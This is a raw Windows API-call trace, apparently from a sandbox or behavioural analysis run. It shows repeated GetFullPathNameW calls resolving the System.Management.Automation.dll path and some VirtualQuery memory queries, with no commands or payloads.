	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.964] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.964] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.964] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.965] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.965] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.966] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.967] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.967] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.967] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.969] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.970] VirtualQuery (in: lpAddress=0x1caff0, lpBuffer=0x1cbeb0, dwLength=0x30 | out: lpBuffer=0x1cbeb0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.970] VirtualQuery (in: lpAddress=0x1cb080, lpBuffer=0x1cbf40, dwLength=0x30 | out: lpBuffer=0x1cbf40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
